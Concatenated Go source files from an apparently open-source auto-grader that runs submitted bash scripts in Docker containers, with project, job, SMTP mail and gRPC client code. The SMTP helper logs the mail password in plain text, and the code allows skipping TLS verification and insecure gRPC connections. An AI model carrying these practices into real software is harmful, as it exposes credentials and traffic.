out[\n%s\n] err::[%v]", string(out), err) return nil }, } cmd.PersistentFlags().StringP("config", "c", "", "explicit assign a configuration file") cmd.PersistentFlags().BoolP("verbose", "v", false, "log verbose") cmd.PersistentFlags().StringP("out", "o", "/tmp", "output folder") log.Infof("start.[%v]", os.Args[0]) if err := cmd.Execute(); err != nil { log.Infof("%v: %v", os.Args[0], err) os.Exit(1) } } <file_sep>package service import ( "context" "errors" "fmt" "github.com/argcv/go-argcvapis/app/manul/file" pb "github.com/argcv/go-argcvapis/app/manul/job" "github.com/argcv/go-argcvapis/status/errcodes" "github.com/argcv/manul/client/mongo" "github.com/argcv/manul/model" "github.com/argcv/webeh/log" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/container" "github.com/docker/docker/client" "gopkg.in/mgo.v2/bson" "io/ioutil" "os" "path" "time" ) type JobServiceImpl struct { env *Env nRunningJobs int } /* TODO:Not implemented yet */ func (j *JobServiceImpl) ListJobs(context.Context, *pb.ListJobsRequest) (*pb.ListJobsResponse, error) { return nil, errors.New("implement me") } /* TODO:Not implemented yet */ func (j *JobServiceImpl) startJob(job *model.Job) { go func() { log.Infof("starting job... 
id: %v, project id: %v, user id:%v", job.Id, job.ProjectId, job.UserId) // if pj, err := j.env.ProjectService.findProject(job.ProjectId.Hex(), ""); err != nil { msg := fmt.Sprintf("invalid project: %v", err) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } else { pjwkdir := j.env.SpawnProjectWorkdir().Goto(pj.Id.Hex()).Rebase() log.Infof("project folder: %v", pjwkdir.Path("/")) jbwkdir := j.env.SpawnJobWorkdir().Goto(job.Id.Hex()).Rebase() log.Infof("job dir: %v", jbwkdir.Path("/")) cfg, e := model.LoadProjectConfig(pjwkdir.Path("manul.project.yml")) if e != nil { msg := fmt.Sprintf("load configure file failed...: %v", e) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } containerName := job.Id.Hex() // init client ctx := context.Background() cli, err := client.NewClientWithOpts(client.FromEnv, client.WithVersion("1.37"), func(c *client.Client) error { log.Warnf("Get Version: %v", c.ClientVersion()) return nil }) cli.ClientVersion() if err != nil { msg := fmt.Sprintf("get docker client failed!!! 
:%v", err) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } image := cfg.Image if image == "" { // default name image = "fedora" } //reader, err := cli.ImagePull(ctx, "docker.io/library/alpine", types.ImagePullOptions{}) reader, err := cli.ImagePull(ctx, image, types.ImagePullOptions{}) if err != nil { msg := fmt.Sprintf("pull image failed...: %v", e) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } pullMsg, err := ioutil.ReadAll(reader) if err != nil { msg := fmt.Sprintf("get pull image resp failed...: %v", e) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } log.Infof("Pull Message: [%v]", string(pullMsg)) bse := cfg.ToBashScriptsExecutor() bse.Id = containerName workingdir := "/home/job" volumes := []string{ fmt.Sprintf("%s:%s:ro", pjwkdir.Path("/"), "/home/project"), fmt.Sprintf("%s:%s", jbwkdir.Path("/"), workingdir), } //for _, volume := range cfg.Volume { // volumes = append(volumes, fmt.Sprintf("%v/%v", basedir, volume)) //} resp, err := cli.ContainerCreate(ctx, &container.Config{ Image: cfg.Image, Entrypoint: []string{"bash", "-c"}, //Cmd: []string{"/proc/meminfo"}, //Cmd: []string{"ls -a /usr"}, Env: cfg.Env, Cmd: []string{bse.EncodedScript()}, Tty: true, Hostname: "bootcamp", Domainname: "local", WorkingDir: workingdir, }, &container.HostConfig{ //Binds: []string{ // //fmt.Sprintf("%v/test-data/data:/tmp:ro", basedir), // fmt.Sprintf("%v/test-data/data:/tmp:ro", basedir), //}, Binds: volumes, Resources: container.Resources{ Memory: int64(cfg.MaximumMemMb) * 1024 * 1024, //Memory: 1024 * 1024 * 5, // 100 MB //KernelMemory: 1024 * 1024 * 1, // 100 MB //Memory int64 // Memory limit (in bytes) }, }, nil, containerName) if err != nil { msg := fmt.Sprintf("container create failed...: %v", e) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) 
j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } j.updateJobLog(job.Id.Hex(), fmt.Sprintf("job started at: %v", time.Now())) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_PENDING) log.Infof("resp.id: %v", resp.ID) if err := cli.ContainerStart(ctx, resp.ID, types.ContainerStartOptions{}); err != nil { msg := fmt.Sprintf("container start failed...: %v", e) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } statusCh, errCh := cli.ContainerWait(ctx, resp.ID, container.WaitConditionNotRunning) select { case err := <-errCh: if err != nil { panic(err) } case st := <-statusCh: log.Infof("Wait... %v, %v", st.StatusCode, st.Error) } logs, err := cli.ContainerLogs(ctx, resp.ID, types.ContainerLogsOptions{ShowStdout: true}) if err != nil { panic(err) } logsMsg, err := ioutil.ReadAll(logs) if err != nil { panic(err) } log.Infof("Log: [%v]", string(logsMsg)) var expire = 1 * time.Second err = cli.ContainerStop(ctx, resp.ID, &expire) if err != nil { log.Errorf("Error: %v", err) } err = cli.ContainerRemove(ctx, resp.ID, types.ContainerRemoveOptions{ RemoveVolumes: true, Force: true, }) if err != nil { log.Errorf("remove failed..: %v", err) } log.Infof("Done.") j.updateJobLog(job.Id.Hex(), string(logsMsg)) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_OK) return } }() } func (j *JobServiceImpl) updateJobLog(id string, log string) error { mc := j.env.SpawnMgoCli() defer mc.Close() q := bson.M{} u := bson.M{} if jid, e := mongo.SafeToObjectId(id); e == nil { q["_id"] = jid u = mongo.SetOperator(bson.M{ "log": log, }) return mc.Update(DbJobColl, q, u) } else { return e } } func (j *JobServiceImpl) updateJobProgress(id string, progress pb.JobProgress) error { mc := j.env.SpawnMgoCli() defer mc.Close() q := bson.M{} u := bson.M{} if jid, e := mongo.SafeToObjectId(id); e == nil { q["_id"] = jid u = mongo.SetOperator(bson.M{ "progress": progress, }) return mc.Update(DbJobColl, q, u) } else { return e } 
} func (j *JobServiceImpl) updateJob(job *model.Job) error { mc := j.env.SpawnMgoCli() defer mc.Close() q := bson.M{} q["_id"] = job.Id return mc.Update(DbJobColl, q, job) } func (j *JobServiceImpl) findJob(id string) (job *model.Job, err error) { mc := j.env.SpawnMgoCli() defer mc.Close() q := bson.M{} if oid, e := mongo.SafeToObjectId(id); e != nil { return nil, e } else { q["_id"] = oid } log.Infof("query: %v", q) err = mc.One(DbJobColl, q, &job) return } func (j *JobServiceImpl) createJob(uid, pid bson.ObjectId, files *file.Files) (job *model.Job, err error) { mc := j.env.SpawnMgoCli() defer mc.Close() // create job job = model.NewJob(uid, pid) // write files base := j.env.SpawnJobWorkdir().Goto(job.Id.Hex()).Rebase() // write files here for _, f := range files.Data { var perm os.FileMode = 0600 if f.Meta != nil && f.Meta.Fields != nil { if cp, ok := f.Meta.Fields["perm"]; ok { fcp := cp.GetNumberValue() log.Debugf("file: [%v] => [%v] , perm: %v", f.Path, f.Name, fcp) if fcp > 0 && fcp <= 0777 { perm = os.FileMode(fcp) } } } base.WriteFile(path.Join(f.Path, f.Name), f.Data, perm) } if err = mc.Insert(DbJobColl, job); err != nil { return } // it is used to Start a job j.startJob(job) return } func (j *JobServiceImpl) CreateJob(ctx context.Context, req *pb.CreateJobRequest) (ret *pb.CreateJobResponse, e error) { log.Infof("Create Job...") if ucli, err := j.env.ParseAuthInfo(ctx, req.Auth); err != nil || (ucli.UserType != model.UserType_ADMIN && ucli.UserType != model.UserType_USER) { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: fmt.Sprintf("invalid auth: %v", err), } ret = &pb.CreateJobResponse{ Success: false, Result: &pb.CreateJobResponse_Error{ Error: st.ToPbStatus(), }, } return } else if req.Files == nil { st := model.Status{ Code: errcodes.Code_INVALID_ARGUMENT, Message: "missing files", } ret = &pb.CreateJobResponse{ Success: false, Result: &pb.CreateJobResponse_Error{ Error: st.ToPbStatus(), }, } return } else { if p, err := 
j.env.ProjectService.findProject(req.ProjectId, ""); err != nil { st := model.Status{ Code: errcodes.Code_INVALID_ARGUMENT, Message: fmt.Sprintf("invalid project id: %v", err), } ret = &pb.CreateJobResponse{ Success: false, Result: &pb.CreateJobResponse_Error{ Error: st.ToPbStatus(), }, } return } else if j, err := j.createJob(ucli.Id, p.Id, req.Files); err != nil { st := model.Status{ Code: errcodes.Code_INTERNAL, Message: fmt.Sprintf("invalid project id: %v", err), } ret = &pb.CreateJobResponse{ Success: false, Result: &pb.CreateJobResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.CreateJobResponse{ Success: true, Result: &pb.CreateJobResponse_Job{ Job: j.ToPbJob(), }, } return } } } func (j *JobServiceImpl) GetJob(ctx context.Context, req *pb.GetJobRequest) (ret *pb.GetJobResponse, e error) { log.Infof("Get Job...") if ucli, err := j.env.ParseAuthInfo(ctx, req.Auth); err != nil || (ucli.UserType != model.UserType_ADMIN && ucli.UserType != model.UserType_USER) { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: fmt.Sprintf("invalid auth: %v", err), } ret = &pb.GetJobResponse{ Success: false, Result: &pb.GetJobResponse_Error{ Error: st.ToPbStatus(), }, } return } else if job, err := j.findJob(req.Id); err != nil { st := model.Status{ Code: errcodes.Code_NOT_FOUND, Message: fmt.Sprintf("job not found: %v", e), } ret = &pb.GetJobResponse{ Success: false, Result: &pb.GetJobResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.GetJobResponse{ Success: true, Result: &pb.GetJobResponse_Job{ Job: job.ToPbJob(), }, } return } } /* TODO:Not implemented yet */ func (j *JobServiceImpl) CancelJob(context.Context, *pb.CancelJobRequest) (*pb.CancelJobResponse, error) { return nil, errors.New("implement me") } <file_sep>package mail import ( "crypto/tls" "github.com/argcv/manul/config" "gopkg.in/gomail.v2" "sync" "time" "github.com/argcv/webeh/log" ) // for future update, // please refer to this example: // 
https://github.com/go-gomail/gomail/blob/master/example_test.go#L1 type SMTPSession struct { Dialer *gomail.Dialer Message *gomail.Message Config *config.SMTPConfig } var ( defaultSMTPConfig *config.SMTPConfig defaultSMTPConfigIsInitialized sync.Once ) func NewSMTPSession() (s *SMTPSession, err error) { defaultSMTPConfigIsInitialized.Do(func() { defaultSMTPConfig = config.GetSMTPConfig() }) m := gomail.NewMessage() log.Infof("Username: %v", defaultSMTPConfig.GetUsername()) log.Infof("Password: %v", defaultSMTPConfig.GetPassword()) dialer := gomail.NewDialer( defaultSMTPConfig.Host, defaultSMTPConfig.Port, defaultSMTPConfig.GetUsername(), defaultSMTPConfig.GetPassword()) if defaultSMTPConfig.InsecureSkipVerify { dialer.TLSConfig = &tls.Config{InsecureSkipVerify: true} } s = &SMTPSession{ Message: m, Dialer: dialer, Config: defaultSMTPConfig, } return } func (s *SMTPSession) DefaultFrom() *SMTPSession { var names []string if s.Config.Sender != "" { names = append(names, s.Config.Sender) } s.From(s.Config.DefaultFrom, names...) 
return s } func (s *SMTPSession) From(from string, name ...string) *SMTPSession { if len(name) > 0 { log.Infof("from: <%s> <%s>", from, name[0]) s.Message.SetHeaders(map[string][]string{ "From": {s.Message.FormatAddress(from, name[0])}, }) } else { s.Message.SetHeader("From", from) } return s } func (s *SMTPSession) To(to string, name ...string) *SMTPSession { if len(name) > 0 { s.Message.SetHeader("To", to, name[0]) } else { s.Message.SetHeader("To", to) } return s } func (s *SMTPSession) Cc(cc string, name ...string) *SMTPSession { if len(name) > 0 { s.Message.SetHeader("Cc", cc, name[0]) } else { s.Message.SetHeader("Cc", cc) } return s } func (s *SMTPSession) Subject(subject string) *SMTPSession { s.Message.SetHeader("Subject", subject) return s } func (s *SMTPSession) PlainBody(body string, alternative ...string) *SMTPSession { s.Message.SetBody("text/plain", body) if len(alternative) > 0 { s.Message.AddAlternative("text/html", alternative[0]) } return s } func (s *SMTPSession) HtmlBody(body string) *SMTPSession { s.Message.SetBody("text/html", body) return s } func (s *SMTPSession) Attach(path string, name ...string) *SMTPSession { if len(name) > 0 { s.Message.Attach(path, gomail.Rename(name[0])) } else { s.Message.Attach(path) } return s } func (s *SMTPSession) WithDate() *SMTPSession { m := s.Message m.SetHeaders(map[string][]string{ "X-Date": {m.FormatDate(time.Now())}, }) return s } func (s *SMTPSession) Send(to, subject, body string) error { s.To(to) s.Subject(subject) s.HtmlBody(body) return s.Dialer.DialAndSend(s.Message) } func (s *SMTPSession) Perform() error { return s.Dialer.DialAndSend(s.Message) } <file_sep>#!/usr/bin/env bash find . 
-name '*.go' | xargs -n 1 -I{} -P 6 sh -c 'echo "reformat: {}" && gofmt -w {}' <file_sep>package service import ( "context" "errors" "fmt" pb "github.com/argcv/go-argcvapis/app/manul/project" "github.com/argcv/go-argcvapis/status/errcodes" "github.com/argcv/manul/client/mongo" "github.com/argcv/manul/client/workdir" "github.com/argcv/manul/model" "github.com/argcv/webeh/log" "gopkg.in/mgo.v2/bson" "os" "path" "sync" "time" ) type ProjectServiceImpl struct { env *Env muFs *sync.Mutex } func NewProjectServiceImpl(env *Env) *ProjectServiceImpl { return &ProjectServiceImpl{ env: env, muFs: &sync.Mutex{}, } } func (p *ProjectServiceImpl) InitProjectWorkdir(id string) (err error) { p.muFs.Lock() defer p.muFs.Unlock() base := p.env.SpawnProjectWorkdir().Goto(id) if base.Exists("/") || base.IsDir("/") { return errors.New("already exists") } else { // init folder base.MkdirAll("/", 0700) } return } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) ListProjects(context.Context, *pb.ListProjectsRequest) (*pb.ListProjectsResponse, error) { return nil, errors.New("implement me") } func (p *ProjectServiceImpl) createProject(base *workdir.Workdir, id, name, desc, createdBy string) (proj *model.Project, err error) { mc := p.env.SpawnMgoCli() defer mc.Close() pid, e := mongo.SafeToObjectId(id) if e != nil { pid = mongo.NewObjectId() } projCfg, e := model.LoadProjectConfig(base.Path("manul.project.yml")) if e != nil { log.Errorf("Create failed... 
removing folder : %v err: %v", base.GetCwd(), base.RemoveCwd()) return nil, e } proj = &model.Project{ Id: pid, Name: name, Desc: desc, CreateTime: time.Now(), UpdatedTime: time.Now(), CreatedBy: createdBy, Config: projCfg, } err = mc.Insert(DbProjectColl, proj) return } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) CreateProject(ctx context.Context, req *pb.CreateProjectRequest) (ret *pb.CreateProjectResponse, e error) { log.Infof("Create project...") if ucli, err := p.env.ParseAuthInfo(ctx, req.Auth); err != nil || ucli.UserType != model.UserType_ADMIN { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: fmt.Sprintf("invalid auth: %v", err), } ret = &pb.CreateProjectResponse{ Success: false, Result: &pb.CreateProjectResponse_Error{ Error: st.ToPbStatus(), }, } return } else { reqProj := req.Project id := mongo.NewObjectId().Hex() name := reqProj.Name desc := reqProj.Desc if err := p.InitProjectWorkdir(id); err != nil { st := model.Status{ Code: errcodes.Code_INTERNAL, Message: "unexpected folder already exists", } ret = &pb.CreateProjectResponse{ Success: false, Result: &pb.CreateProjectResponse_Error{ Error: st.ToPbStatus(), }, } return } else { base := p.env.SpawnProjectWorkdir().Goto(id).Rebase() // write files here for _, f := range reqProj.Files.Data { var perm os.FileMode = 0600 if f.Meta != nil && f.Meta.Fields != nil { if cp, ok := f.Meta.Fields["perm"]; ok { fcp := cp.GetNumberValue() log.Debugf("file: [%v] => [%v] , perm: %v", f.Path, f.Name, fcp) if fcp > 0 && fcp <= 0777 { perm = os.FileMode(fcp) } } } base.WriteFile(path.Join(f.Path, f.Name), f.Data, perm) } if rp, err := p.createProject(base, id, name, desc, ucli.Name); err != nil { st := model.Status{ Code: errcodes.Code_INTERNAL, Message: fmt.Sprintf("Internal Error: %v", err), } ret = &pb.CreateProjectResponse{ Success: false, Result: &pb.CreateProjectResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.CreateProjectResponse{ Success: true, Result: 
&pb.CreateProjectResponse_Project{ Project: rp.ToPbProject(true), }, } return } } } return } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) UpdateProject(context.Context, *pb.UpdateProjectRequest) (*pb.UpdateProjectResponse, error) { return nil, errors.New("implement me") } func (s *ProjectServiceImpl) findProject(id string, name string) (project *model.Project, err error) { mc := s.env.SpawnMgoCli() defer mc.Close() q := bson.M{} badreq := true if pid, e := mongo.SafeToObjectId(id); e == nil { q["_id"] = pid badreq = false } if name != "" { q["name"] = name badreq = false } if badreq { return nil, errors.New("missing args") } log.Infof("query: %v", q) err = mc.One(DbProjectColl, q, &project) return } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) GetProject(context.Context, *pb.GetProjectRequest) (*pb.GetProjectResponse, error) { return nil, errors.New("implement me") } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) GetProjectChecklist(context.Context, *pb.GetProjectChecklistRequest) (*pb.GetProjectChecklistResponse, error) { return nil, errors.New("implement me") } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) DeleteProject(context.Context, *pb.DeleteProjectRequest) (*pb.DeleteProjectResponse, error) { return nil, errors.New("implement me") } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) UpdateProjectMember(context.Context, *pb.UpdateProjectMemberRequest) (*pb.UpdateProjectMemberResponse, error) { return nil, errors.New("implement me") } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) ListProjectMembers(context.Context, *pb.ListProjectMembersRequest) (*pb.ListProjectMembersResponse, error) { return nil, errors.New("implement me") } <file_sep>package helpers import ( "math/rand" "testing" "time" ) func TestRandomString(t *testing.T) { rand.Seed(time.Now().Unix()) s := RandomString(10, CharsetDigit) t.Logf("Random Digits: %s", s) if len(s) != 10 { t.Fatalf("Incorrect Size:: %v", len(s)) 
} s = RandomString(10, CharsetCharLowerCase) t.Logf("Random Lowercase: %s", s) if len(s) != 10 { t.Fatalf("Incorrect Size:: %v", len(s)) } s = RandomString(10, CharsetHex) t.Logf("Random HexDigits: %s", s) if len(s) != 10 { t.Fatalf("Incorrect Size:: %v", len(s)) } } <file_sep>package config func GetFsWorkdir() string { return getStringOrDefault(KeyFsWorkdir, "/tmp/manul/workdir") } <file_sep>package helpers import ( "fmt" "os/exec" "strings" ) type BashScriptStage struct { Name string Scripts []string } func NewBashScriptStage(name string, scripts ...string) *BashScriptStage { return &BashScriptStage{ Name: name, Scripts: scripts, } } func (e *BashScriptStage) EncodedScripts(job string) []string { scripts := []string{ fmt.Sprintf("echo 'manul:%s:stage:start:%s'", job, e.Name), } for _, script := range e.Scripts { prompt := fmt.Sprintf("echo '$ %s'", strings.Replace(script, "'", "'\\''", -1)) scripts = append(scripts, prompt, script) } scripts = append(scripts, fmt.Sprintf("echo 'manul:%s:stage:end:%s'", job, e.Name)) return scripts } func (e *BashScriptStage) AddScripts(scripts ...string) *BashScriptStage { e.Scripts = append(e.Scripts, scripts...) return e } func (e *BashScriptStage) SetScripts(scripts ...string) *BashScriptStage { e.Scripts = scripts return e } type BashScriptsExecutor struct { Id string Env []string Stages []BashScriptStage } func NewBashScriptsExecutor(id string, env ...string) *BashScriptsExecutor { return &BashScriptsExecutor{ Id: id, Env: env, } } func (e *BashScriptsExecutor) AddEnv(env ...string) *BashScriptsExecutor { e.Env = append(e.Env, env...) return e } func (e *BashScriptsExecutor) SetEnv(env ...string) *BashScriptsExecutor { e.Env = env return e } func (e *BashScriptsExecutor) AddStage(stage *BashScriptStage) *BashScriptsExecutor { e.Stages = append(e.Stages, *stage) return e } func (e *BashScriptsExecutor) AddScriptsInStage(name string, scripts ...string) *BashScriptsExecutor { stage := NewBashScriptStage(name, scripts...) 
e.Stages = append(e.Stages, *stage) return e } func (e *BashScriptsExecutor) EncodedScript() string { scripts := []string{ "set -Eeo pipefail", } for _, stage := range e.Stages { scripts = append(scripts, stage.EncodedScripts(e.Id)...) } return strings.Join(scripts, ";") } func (e *BashScriptsExecutor) Perform() ([]byte, error) { cfg := exec.Command("bash", "-c", e.EncodedScript()) cfg.Env = e.Env return cfg.CombinedOutput() } <file_sep>package main import ( "fmt" "github.com/argcv/manul/cmd/manul/command/client" "github.com/argcv/manul/cmd/manul/command/server" "github.com/argcv/manul/cmd/manul/command/shell" "github.com/argcv/manul/version" configeh "github.com/argcv/webeh/config" "github.com/argcv/webeh/log" "github.com/spf13/cobra" "math/rand" "os" "path" "time" ) var ( rootCmd = &cobra.Command{ Use: "manul", Short: "Manul is an Auto Grader", PersistentPreRunE: func(cmd *cobra.Command, args []string) error { log.Infof("Manul version: %s (%s) Built At: %v", version.Version, version.GitHash, version.BuildDate) if verbose, err := cmd.Flags().GetBool("verbose"); err == nil { if verbose { log.Verbose() log.Debug("verbose mode: ON") } } conf, _ := cmd.Flags().GetString("config") if e := configeh.LoadConfig(configeh.Option{ Project: "manul", Path: conf, DefaultPath: path.Join(os.Getenv("HOME"), ".manul"), FileMustExists: true, }); e != nil { return e } // set rand seed rand.Seed(time.Now().Unix()) return nil }, } versionCmd = &cobra.Command{ Use: "version", Short: "Prints the version of manul.", // do not execute any persistent actions PersistentPreRun: func(cmd *cobra.Command, args []string) {}, Run: func(cmd *cobra.Command, args []string) { fmt.Println("manul version:", version.Version) fmt.Println("Git commit hash:", version.GitHash) if version.BuildDate != "" { fmt.Println("Build date:", version.BuildDate) } }, } ) func init() { rootCmd.AddCommand( versionCmd, server.NewManulRpcServerCommand(), client.NewManulProjectCommand(), client.NewManulJobCommand(), 
shell.NewShellCommand(), shell.NewSetupCommand(), shell.NewLoginCommand(), ) rootCmd.PersistentFlags().StringP("config", "c", "", "explicit assign a configuration file") rootCmd.PersistentFlags().BoolP("verbose", "v", false, "log verbose") } func main() { if err := rootCmd.Execute(); err != nil { log.Infof("%v", err) os.Exit(1) } } <file_sep>/* * The MIT License (MIT) * * Copyright (c) 2018 <NAME> <<EMAIL>> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. 
* */ package helpers /** * Fair Queue: * a fifo queue, which is used to help us schedule the * sequence of execution * * It could also treated as some kind of Lock */ type FairQueue struct { c chan func() wg *WaitGroupWithState sd *SingletonDesc } func NewFairQueue() *FairQueue { return &FairQueue{ c: make(chan func()), wg: NewWaitGroupWithState(), sd: NewSingleton(), } } func (q *FairQueue) Perform() { go q.sd.Acquire(func() { for f := range q.c { f() if q.wg.Done() == 0 { return } } }) } func (q *FairQueue) Enqueue(f func()) { q.wg.Add(1) q.Perform() q.c <- f } func (q *FairQueue) Wait() { q.Perform() q.wg.Wait() } // It's OK to leave a Go channel open forever and never close it. // When the channel is no longer used, it will be garbage collected. // -- <https://stackoverflow.com/questions/8593645> // However we could provide a close + wait interface, which is used // to indicate its finishing func (q *FairQueue) Close() { close(q.c) q.Wait() } <file_sep>package main import ( "fmt" "github.com/argcv/manul/model" "github.com/argcv/webeh/log" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/container" "github.com/docker/docker/client" "golang.org/x/net/context" "io/ioutil" "os" "path" "time" ) func main() { //basedir, e := helpers.GetPathOfSelf() // //if e != nil { // panic("get current path failed") //} basedir, e := os.Getwd() if e != nil { panic("get current path failed") } cfg, e := model.LoadProjectConfig(path.Join(basedir, "manul.project.yml.default")) if e != nil { panic(fmt.Sprintf("load configure file failed...: %v", e)) } containerName := "greeting" ctx := context.Background() cli, err := client.NewClientWithOpts(client.FromEnv, client.WithVersion("1.37"), func(c *client.Client) error { log.Warnf("Get Version: %v", c.ClientVersion()) return nil }) cli.ClientVersion() if err != nil { panic(err) } images, err := cli.ImageList(ctx, types.ImageListOptions{}) for _, image := range images { log.Infof("IMG: %v %v %v", image.ID, 
image.RepoTags, image.RepoDigests) } //reader, err := cli.ImagePull(ctx, "docker.io/library/alpine", types.ImagePullOptions{}) reader, err := cli.ImagePull(ctx, "fedora", types.ImagePullOptions{}) if err != nil { panic(err) } pullMsg, err := ioutil.ReadAll(reader) if err != nil { panic(err) } log.Infof("Pull Message: [%v]", string(pullMsg)) bse := cfg.ToBashScriptsExecutor() bse.Id = "Job1" volumes := []string{} for _, volume := range cfg.Volume { volumes = append(volumes, fmt.Sprintf("%v/%v", basedir, volume)) } resp, err := cli.ContainerCreate(ctx, &container.Config{ Image: cfg.Image, Entrypoint: []string{"bash", "-c"}, //Cmd: []string{"/proc/meminfo"}, //Cmd: []string{"ls -a /usr"}, Env: cfg.Env, Cmd: []string{bse.EncodedScript()}, Tty: true, Hostname: "bootcamp", Domainname: "local", }, &container.HostConfig{ //Binds: []string{ // //fmt.Sprintf("%v/test-data/data:/tmp:ro", basedir), // fmt.Sprintf("%v/test-data/data:/tmp:ro", basedir), //}, Binds: volumes, Resources: container.Resources{ Memory: int64(cfg.MaximumMemMb) * 1024 * 1024, //Memory: 1024 * 1024 * 5, // 100 MB //KernelMemory: 1024 * 1024 * 1, // 100 MB //Memory int64 // Memory limit (in bytes) }, }, nil, containerName) if err != nil { panic(err) } log.Infof("resp.id: %v", resp.ID) if err := cli.ContainerStart(ctx, resp.ID, types.ContainerStartOptions{}); err != nil { panic(err) } statusCh, errCh := cli.ContainerWait(ctx, resp.ID, container.WaitConditionNotRunning) select { case err := <-errCh: if err != nil { panic(err) } case st := <-statusCh: log.Infof("Wait... 
%v, %v", st.StatusCode, st.Error) } logs, err := cli.ContainerLogs(ctx, resp.ID, types.ContainerLogsOptions{ShowStdout: true}) if err != nil { panic(err) } logsMsg, err := ioutil.ReadAll(logs) if err != nil { panic(err) } log.Infof("Log: [%v]", string(logsMsg)) var expire = 1 * time.Second err = cli.ContainerStop(ctx, resp.ID, &expire) if err != nil { log.Errorf("Error: %v", err) } err = cli.ContainerRemove(ctx, resp.ID, types.ContainerRemoveOptions{ RemoveVolumes: true, Force: true, }) if err != nil { panic(err) } log.Infof("Done.") } <file_sep>package config import ( "github.com/argcv/go-argcvapis/app/manul/user" ) func GetClientUserName() string { return getStringOrDefault(KeyClientUserName, "") } func GetClientUserSecret() string { return getStringOrDefault(KeyClientUserSecret, "") } func SetClientUserName(user string) error { return setConfig(KeyClientUserName, user) } func SetClientUserSecret(secret string) error { return setConfig(KeyClientUserSecret, secret) } func GetAuthInfo() (auth *user.AuthToken) { auth = &user.AuthToken{ Name: GetClientUserName(), Secret: GetClientUserSecret(), } return } <file_sep>#!/usr/bin/env bash mongo -u 'manul' -p '<PASSWORD>' --authenticationDatabase admin localhost:27017/admin <file_sep>package client import ( "fmt" "github.com/argcv/go-argcvapis/app/manul/job" "github.com/argcv/go-argcvapis/app/manul/project" "github.com/argcv/go-argcvapis/app/manul/user" "github.com/argcv/manul/config" "github.com/argcv/webeh/log" "google.golang.org/grpc" ) type RpcConn struct { C *grpc.ClientConn } func NewGrpcConn() (c *RpcConn) { rpcHost := config.GetRpcHost() rpcPort := config.GetRpcPort() serverAddr := fmt.Sprintf("%s:%d", rpcHost, rpcPort) opts := []grpc.DialOption{ grpc.WithInsecure(), } c = &RpcConn{} conn, err := grpc.Dial(serverAddr, opts...) 
c.C = conn if err != nil { log.Fatalf("fail to dial: %v", err) } return } func (c *RpcConn) Close() { c.C.Close() } func (c *RpcConn) NewProjectCli() project.ProjectServiceClient { return project.NewProjectServiceClient(c.C) } func (c *RpcConn) NewUserCli() user.UserServiceClient { return user.NewUserServiceClient(c.C) } func (c *RpcConn) NewJobCli() job.JobServiceClient { return job.NewJobServiceClient(c.C) } <file_sep>package version var ( Version = "0.0.1" GitHash = "unknown" BuildDate string = "unknown" ) <file_sep>package workdir import ( "github.com/argcv/go-argcvapis/app/manul/file" "github.com/argcv/manul/helpers" "github.com/argcv/webeh/log" "github.com/pkg/errors" "io/ioutil" "os" "path" ) type Workdir struct { Base string Cwd string isRoot bool parent *Workdir } func NewWorkdir(base string) *Workdir { base = path.Clean(base) dir, err := helpers.GetPathOfSelf() if err != nil { log.Errorf("Get Current GetCwd failed... %v", err) dir = "/tmp" } if base[0] != '/' { // relative path base = path.Join(dir, base) } os.MkdirAll(base, 0700) env := &Workdir{ Base: base, Cwd: "/", isRoot: true, } env.parent = env return env } func (env *Workdir) Spawn() (sub *Workdir) { return &Workdir{ Base: env.Base, Cwd: env.Cwd, isRoot: false, parent: env, } } func (env *Workdir) Rebase() (sub *Workdir) { return &Workdir{ Base: path.Join(env.Base, env.Cwd), Cwd: "/", isRoot: false, parent: env, } } func (env *Workdir) GetRoot() *Workdir { if env.isRoot { return env } else { return env.parent.GetRoot() } } // Placeholder, close func (env *Workdir) Close() { if env.isRoot { } else { } } func (env 